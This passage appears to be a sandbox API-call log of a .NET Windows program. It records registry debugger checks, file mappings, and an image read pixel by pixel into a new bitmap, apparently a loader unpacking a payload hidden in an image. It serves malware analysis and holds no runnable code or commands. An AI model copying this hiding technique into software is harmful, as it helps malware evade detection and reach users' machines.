dwStyle=0x2010000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0xfffffffd, hMenu=0x0, hInstance=0x4f0000, lpParam=0x0) returned 0xa001e [0200.903] SetWindowLongW (hWnd=0xa001e, nIndex=-4, dwNewLong=1951336416) returned 76678590 [0200.904] GetWindowLongW (hWnd=0xa001e, nIndex=-4) returned 1951336416 [0200.906] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x18e60c | out: phkResult=0x18e60c*=0x28c) returned 0x0 [0200.907] RegQueryValueExW (in: hKey=0x28c, lpValueName="DbgJITDebugLaunchSetting", lpReserved=0x0, lpType=0x18e62c, lpData=0x0, lpcbData=0x18e628*=0x0 | out: lpType=0x18e62c*=0x0, lpData=0x0, lpcbData=0x18e628*=0x0) returned 0x2 [0200.907] RegQueryValueExW (in: hKey=0x28c, lpValueName="DbgManagedDebugger", lpReserved=0x0, lpType=0x18e62c, lpData=0x0, lpcbData=0x18e628*=0x0 | out: lpType=0x18e62c*=0x0, lpData=0x0, lpcbData=0x18e628*=0x0) returned 0x2 [0200.907] RegCloseKey (hKey=0x28c) returned 0x0 [0200.909] SetWindowLongW (hWnd=0xa001e, nIndex=-4, dwNewLong=76678630) returned 1951336416 [0200.909] GetWindowLongW (hWnd=0xa001e, nIndex=-4) returned 76678630 [0200.909] GetWindowLongW (hWnd=0xa001e, nIndex=-16) returned 113311744 [0200.911] RegisterClipboardFormatW (lpszFormat="WinFormsMouseEnter") returned 0xc244 [0200.911] CallWindowProcW (lpPrevWndFunc=0x744f07e0, hWnd=0xa001e, Msg=0x24, wParam=0x0, lParam=0x18e924) returned 0x0 [0200.911] RegisterClipboardFormatW (lpszFormat="WinFormsUnSubclass") returned 0xc246 [0200.912] CallWindowProcW (lpPrevWndFunc=0x744f07e0, hWnd=0xa001e, Msg=0x81, wParam=0x0, lParam=0x18e918) returned 0x1 [0200.960] CallWindowProcW (lpPrevWndFunc=0x744f07e0, hWnd=0xa001e, Msg=0x83, wParam=0x0, lParam=0x18e904) returned 0x0 [0200.965] CallWindowProcW (lpPrevWndFunc=0x744f07e0, hWnd=0xa001e, Msg=0x1, wParam=0x0, lParam=0x18e918) returned 0x0 [0200.965] GetClientRect (in: hWnd=0xa001e, lpRect=0x18e644 | out: lpRect=0x18e644) returned 1 [0200.965] GetWindowRect (in: hWnd=0xa001e, lpRect=0x18e644 | out: lpRect=0x18e644) returned 1 [0200.967] GetParent (hWnd=0xa001e) returned 0x0 [0200.967] DeactivateActCtx (dwFlags=0x0, ulCookie=0x14c90001) returned 1 [0202.016] EtwEventRegister (in: ProviderId=0x2328c58, EnableCallback=0x492060e, CallbackContext=0x0, RegHandle=0x2328c34 | out: RegHandle=0x2328c34) returned 0x0 [0202.021] EtwEventSetInformation (RegHandle=0x955120, InformationClass=0x28, EventInformation=0x2, InformationLength=0x2328bc8) returned 0x0 [0202.354] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ed30000 [0202.356] AdjustWindowRectEx (in: lpRect=0x18ef24, dwStyle=0x56010000, bMenu=0, dwExStyle=0x0 | out: lpRect=0x18ef24) returned 1 [0202.359] OleInitialize (pvReserved=0x0) returned 0x0 [0202.362] RegisterClipboardFormatW (lpszFormat="WindowsForms12_subclassCheck") returned 0xc247 [0202.365] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ed30000 [0202.365] AdjustWindowRectEx (in: lpRect=0x18ef14, dwStyle=0x56010000, bMenu=0, dwExStyle=0x0 | out: lpRect=0x18ef14) returned 1 [0204.630] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\alpha73882.config", nBufferLength=0x105, lpBuffer=0x18e8c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\alpha73882.config", lpFilePart=0x0) returned 0x37 [0206.580] GetCurrentProcess () returned 0xffffffff [0206.581] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18ec28 | out: TokenHandle=0x18ec28*=0x298) returned 1 [0206.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", nBufferLength=0x105, lpBuffer=0x18e6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", lpFilePart=0x0) returned 0x2e [0206.639] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x18ec20 | out: lpFileInformation=0x18ec20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56a29ff, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97df7583, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97df7583, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0206.641] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x18e68c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0206.642] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x18ec28 | out: lpFileInformation=0x18ec28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56a29ff, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97df7583, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97df7583, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0206.643] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x18e628, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0206.645] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x18eb60) returned 1 [0206.646] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x29c [0206.646] GetFileType (hFile=0x29c) returned 0x1 [0206.646] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x18eb5c) returned 1 [0206.646] GetFileType (hFile=0x29c) returned 0x1 [0206.795] GetFileSize (in: hFile=0x29c, lpFileSizeHigh=0x18ec1c | out: lpFileSizeHigh=0x18ec1c*=0x0) returned 0x8c8f [0206.796] ReadFile (in: hFile=0x29c, lpBuffer=0x233ef8c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18ebd8, lpOverlapped=0x0 | out: lpBuffer=0x233ef8c*, lpNumberOfBytesRead=0x18ebd8*=0x1000, lpOverlapped=0x0) returned 1 [0206.876] ReadFile (in: hFile=0x29c, lpBuffer=0x233ef8c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18ea88, lpOverlapped=0x0 | out: lpBuffer=0x233ef8c*, lpNumberOfBytesRead=0x18ea88*=0x1000, lpOverlapped=0x0) returned 1 [0206.878] ReadFile (in: hFile=0x29c, lpBuffer=0x233ef8c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18e93c, lpOverlapped=0x0 | out: lpBuffer=0x233ef8c*, lpNumberOfBytesRead=0x18e93c*=0x1000, lpOverlapped=0x0) returned 1 [0206.879] ReadFile (in: hFile=0x29c, lpBuffer=0x233ef8c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18e93c, lpOverlapped=0x0 | out: lpBuffer=0x233ef8c*, lpNumberOfBytesRead=0x18e93c*=0x1000, lpOverlapped=0x0) returned 1 [0206.880] ReadFile (in: hFile=0x29c, lpBuffer=0x233ef8c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18e93c, lpOverlapped=0x0 | out: lpBuffer=0x233ef8c*, lpNumberOfBytesRead=0x18e93c*=0x1000, lpOverlapped=0x0) returned 1 [0206.880] ReadFile (in: hFile=0x29c, lpBuffer=0x233ef8c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18e874, lpOverlapped=0x0 | out: lpBuffer=0x233ef8c*, lpNumberOfBytesRead=0x18e874*=0x1000, lpOverlapped=0x0) returned 1 [0206.956] ReadFile (in: hFile=0x29c, lpBuffer=0x233ef8c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18e9f4, lpOverlapped=0x0 | out: lpBuffer=0x233ef8c*, lpNumberOfBytesRead=0x18e9f4*=0x1000, lpOverlapped=0x0) returned 1 [0206.959] ReadFile (in: hFile=0x29c, lpBuffer=0x233ef8c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18e904, lpOverlapped=0x0 | out: lpBuffer=0x233ef8c*, lpNumberOfBytesRead=0x18e904*=0x1000, lpOverlapped=0x0) returned 1 [0206.959] ReadFile (in: hFile=0x29c, lpBuffer=0x233ef8c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18e904, lpOverlapped=0x0 | out: lpBuffer=0x233ef8c*, lpNumberOfBytesRead=0x18e904*=0xc8f, lpOverlapped=0x0) returned 1 [0207.010] ReadFile (in: hFile=0x29c, lpBuffer=0x233ef8c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18e9c4, lpOverlapped=0x0 | out: lpBuffer=0x233ef8c*, lpNumberOfBytesRead=0x18e9c4*=0x0, lpOverlapped=0x0) returned 1 [0207.011] CloseHandle (hObject=0x29c) returned 1 [0207.013] GetCurrentProcess () returned 0xffffffff [0207.013] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18ed6c | out: TokenHandle=0x18ed6c*=0x29c) returned 1 [0207.014] GetCurrentProcess () returned 0xffffffff [0207.014] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18ed6c | out: TokenHandle=0x18ed6c*=0x2a0) returned 1 [0207.015] GetCurrentProcess () returned 0xffffffff [0207.015] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18ec28 | out: TokenHandle=0x18ec28*=0x2a4) returned 1 [0207.015] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\alpha73882.config" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\alpha73882.config"), fInfoLevelId=0x0, lpFileInformation=0x18ec20 | out: lpFileInformation=0x18ec20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0207.015] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\alpha73882.config", nBufferLength=0x105, lpBuffer=0x18e68c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\alpha73882.config", lpFilePart=0x0) returned 0x37 [0207.016] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\alpha73882.config" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\alpha73882.config"), fInfoLevelId=0x0, lpFileInformation=0x18ec28 | out: lpFileInformation=0x18ec28*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0207.016] GetCurrentProcess () returned 0xffffffff [0207.016] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18ed6c | out: TokenHandle=0x18ed6c*=0x2a8) returned 1 [0207.017] GetCurrentProcess () returned 0xffffffff [0207.017] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18ed6c | out: TokenHandle=0x18ed6c*=0x2ac) returned 1 [0207.090] GetCurrentProcess () returned 0xffffffff [0207.090] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18ebcc | out: TokenHandle=0x18ebcc*=0x2b0) returned 1 [0207.099] GetCurrentProcess () returned 0xffffffff [0207.099] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18ebdc | out: TokenHandle=0x18ebdc*=0x2b4) returned 1 [0207.367] GetProcessWindowStation () returned 0xf0 [0207.371] GetUserObjectInformationA (in: hObj=0xf0, nIndex=1, pvInfo=0x2358490, nLength=0xc, lpnLengthNeeded=0x18e7d4 | out: pvInfo=0x2358490, lpnLengthNeeded=0x18e7d4) returned 1 [0207.375] SetConsoleCtrlHandler (HandlerRoutine=0x4920636, Add=1) returned 1 [0207.376] GetModuleHandleW (lpModuleName=0x0) returned 0x4f0000 [0207.376] GetModuleHandleW (lpModuleName=0x0) returned 0x4f0000 [0207.378] GetClassInfoW (in: hInstance=0x4f0000, lpClassName=".NET-BroadcastEventWindow.4.0.0.0.141b42a.0", lpWndClass=0x23584f4 | out: lpWndClass=0x23584f4) returned 0 [0207.383] CoTaskMemAlloc (cb=0x58) returned 0x9596e0 [0207.383] RegisterClassW (lpWndClass=0x18e724) returned 0xc248 [0207.383] CoTaskMemFree (pv=0x9596e0) [0207.384] CreateWindowExW (dwExStyle=0x0, lpClassName=".NET-BroadcastEventWindow.4.0.0.0.141b42a.0", lpWindowName=".NET-BroadcastEventWindow.4.0.0.0.141b42a.0", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x4f0000, lpParam=0x0) returned 0xc002c [0207.395] NtdllDefWindowProc_W (hWnd=0xc002c, Msg=0x81, wParam=0x0, lParam=0x18e260) returned 0x1 [0207.592] NtdllDefWindowProc_W (hWnd=0xc002c, Msg=0x83, wParam=0x0, lParam=0x18e24c) returned 0x0 [0207.592] NtdllDefWindowProc_W (hWnd=0xc002c, Msg=0x1, wParam=0x0, lParam=0x18e260) returned 0x0 [0207.593] NtdllDefWindowProc_W (hWnd=0xc002c, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0207.593] NtdllDefWindowProc_W (hWnd=0xc002c, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0 [0207.686] IsAppThemed () returned 0x1 [0207.687] GetThemeAppProperties () returned 0x3 [0207.687] GetThemeAppProperties () returned 0x3 [0207.687] OpenThemeData () returned 0x20002 [0208.162] SystemParametersInfoW (in: uiAction=0x29, uiParam=0x1f4, pvParam=0x18e72c, fWinIni=0x0 | out: pvParam=0x18e72c) returned 1 [0208.166] GetDC (hWnd=0x0) returned 0x9010aad [0208.285] GdiplusStartup (in: token=0x6e5f30, input=0x18de28, output=0x18de78 | out: token=0x6e5f30, output=0x18de78) returned 0x0 [0208.867] CoTaskMemAlloc (cb=0x5c) returned 0x95f8a8 [0208.873] GdipCreateFontFromLogfontW (hdc=0x9010aad, logfont=0x95f8a8, font=0x18e934) returned 0x0 [0210.092] CoTaskMemFree (pv=0x95f8a8) [0210.093] CoTaskMemAlloc (cb=0x5c) returned 0x95f7d8 [0210.094] CoTaskMemFree (pv=0x95f7d8) [0210.094] CoTaskMemAlloc (cb=0x5c) returned 0x95f500 [0210.094] CoTaskMemFree (pv=0x95f500) [0210.094] GdipGetFontUnit (font=0x4ab1f08, unit=0x18e900) returned 0x0 [0210.095] GdipGetFontSize (font=0x4ab1f08, size=0x18e904) returned 0x0 [0210.095] GdipGetFontStyle (font=0x4ab1f08, style=0x18e8fc) returned 0x0 [0210.095] GdipGetFamily (font=0x4ab1f08, family=0x18e8f8) returned 0x0 [0210.096] GdipGetFontSize (font=0x4ab1f08, size=0x2359cd8) returned 0x0 [0210.096] ReleaseDC (hWnd=0x0, hDC=0x9010aad) returned 1 [0210.096] GetDC (hWnd=0x0) returned 0x2e010a6f [0210.097] GdipCreateFromHDC (hdc=0x2e010a6f, graphics=0x18e914) returned 0x0 [0210.104] GdipGetDpiY (graphics=0x5d1a9c8, dpi=0x2359de0) returned 0x0 [0210.104] GdipGetFontHeight (font=0x4ab1f08, graphics=0x5d1a9c8, height=0x18e90c) returned 0x0 [0210.105] GdipGetEmHeight (family=0x5d165e8, style=0, EmHeight=0x18e914) returned 0x0 [0210.105] GdipGetLineSpacing (family=0x5d165e8, style=0, LineSpacing=0x18e914) returned 0x0 [0210.105] GdipDeleteGraphics (graphics=0x5d1a9c8) returned 0x0 [0210.108] ReleaseDC (hWnd=0x0, hDC=0x2e010a6f) returned 1 [0210.109] GdipCreateFont (fontFamily=0x5d165e8, emSize=0x41100000, style=0, unit=0x3, font=0x2359da0) returned 0x0 [0210.109] GdipGetFontSize (font=0x4ab0568, size=0x2359da4) returned 0x0 [0210.111] SystemParametersInfoW (in: uiAction=0x100a, uiParam=0x0, pvParam=0x18e9f0, fWinIni=0x0 | out: pvParam=0x18e9f0) returned 1 [0210.113] IsAppThemed () returned 0x1 [0210.114] GetThemeAppProperties () returned 0x3 [0210.114] GetThemeAppProperties () returned 0x3 [0210.114] IsAppThemed () returned 0x1 [0210.114] GetThemeAppProperties () returned 0x3 [0210.114] GetThemeAppProperties () returned 0x3 [0210.222] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\alpha73882.config", nBufferLength=0x105, lpBuffer=0x18e7f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\alpha73882.config", lpFilePart=0x0) returned 0x37 [0210.222] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x18eca4) returned 1 [0210.223] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\alpha73882.config" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\alpha73882.config"), fInfoLevelId=0x0, lpFileInformation=0x18ed20 | out: lpFileInformation=0x18ed20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0210.223] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x18eca0) returned 1 [0231.836] GetACP () returned 0x4e4 [0234.061] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ed30000 [0234.062] AdjustWindowRectEx (in: lpRect=0x18eed8, dwStyle=0x56010000, bMenu=0, dwExStyle=0x0 | out: lpRect=0x18eed8) returned 1 [0234.081] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1b601, lpName=0x0) returned 0x2ac [0234.082] memcpy (in: _Dst=0x22e0000, _Src=0x33294d0, _Size=0x1b601 | out: _Dst=0x22e0000) returned 0x22e0000 [0234.084] CloseHandle (hObject=0x2ac) returned 1 [0244.567] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ed30000 [0244.619] AdjustWindowRectEx (in: lpRect=0x18e550, dwStyle=0x56cf0000, bMenu=0, dwExStyle=0x50001 | out: lpRect=0x18e550) returned 1 [0260.073] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xa000, lpName=0x0) returned 0x2b4 [0260.074] memcpy (in: _Dst=0x5a0000, _Src=0x2394f80, _Size=0xa000 | out: _Dst=0x5a0000) returned 0x5a0000 [0260.075] CloseHandle (hObject=0x2b4) returned 1 [0268.918] GdipLoadImageFromStream (stream=0x5c0030, image=0x18de70) returned 0x0 [0270.517] GdipImageForceValidation (image=0x5d1a9c8) returned 0x0 [0270.985] GdipGetImageType (image=0x5d1a9c8, type=0x18de6c) returned 0x0 [0270.988] GdipGetImageRawFormat (image=0x5d1a9c8, format=0x18dde0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x0 [0271.178] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e414) returned 0x0 [0271.182] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e414) returned 0x0 [0271.187] GdipCreateBitmapFromScan0 (width=308, height=308, stride=0, format=0x26200a, scan0=0x0, bitmap=0x18e3f8) returned 0x0 [0271.887] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0271.887] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0271.888] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=0, y=0, color=0x18e3e0) returned 0x0 [0272.195] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.196] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.196] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.200] GdipBitmapSetPixel (bitmap=0x5d1b670, x=0, y=0, color=0x5bc01) returned 0x0 [0272.201] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.201] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.201] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=1, y=0, color=0x18e3e0) returned 0x0 [0272.201] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.201] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.201] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.201] GdipBitmapSetPixel (bitmap=0x5d1b670, x=1, y=0, color=0x19786594) returned 0x0 [0272.201] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.201] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.201] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=2, y=0, color=0x18e3e0) returned 0x0 [0272.201] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.201] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.201] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.201] GdipBitmapSetPixel (bitmap=0x5d1b670, x=2, y=0, color=0x79068878) returned 0x0 [0272.201] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.201] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.202] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=3, y=0, color=0x18e3e0) returned 0x0 [0272.202] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.202] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.202] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.202] GdipBitmapSetPixel (bitmap=0x5d1b670, x=3, y=0, color=0x78196e50) returned 0x0 [0272.202] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.202] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.202] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=4, y=0, color=0x18e3e0) returned 0x0 [0272.202] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.202] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.202] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.202] GdipBitmapSetPixel (bitmap=0x5d1b670, x=4, y=0, color=0x1d787812) returned 0x0 [0272.202] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.202] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.202] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=5, y=0, color=0x18e3e0) returned 0x0 [0272.202] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.202] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.203] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.203] GdipBitmapSetPixel (bitmap=0x5d1b670, x=5, y=0, color=0x78783217) returned 0x0 [0272.203] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.203] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.203] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=6, y=0, color=0x18e3e0) returned 0x0 [0272.203] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.203] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.203] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.203] GdipBitmapSetPixel (bitmap=0x5d1b670, x=6, y=0, color=0x40e68785) returned 0x0 [0272.203] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.203] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.203] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=7, y=0, color=0x18e3e0) returned 0x0 [0272.203] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.203] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.203] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.203] GdipBitmapSetPixel (bitmap=0x5d1b670, x=7, y=0, color=0x657a87e6) returned 0x0 [0272.203] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.203] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.204] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=8, y=0, color=0x18e3e0) returned 0x0 [0272.204] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.204] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.204] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.204] GdipBitmapSetPixel (bitmap=0x5d1b670, x=8, y=0, color=0xf740e687) returned 0x0 [0272.204] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.204] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.204] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=9, y=0, color=0x18e3e0) returned 0x0 [0272.204] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.204] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.204] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.204] GdipBitmapSetPixel (bitmap=0x5d1b670, x=9, y=0, color=0x7a197878) returned 0x0 [0272.204] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.204] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.204] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=10, y=0, color=0x18e3e0) returned 0x0 [0272.204] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.205] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.205] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.205] GdipBitmapSetPixel (bitmap=0x5d1b670, x=10, y=0, color=0x217c6b18) returned 0x0 [0272.205] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.205] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.205] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=11, y=0, color=0x18e3e0) returned 0x0 [0272.205] GdipGetImagePixelFormat 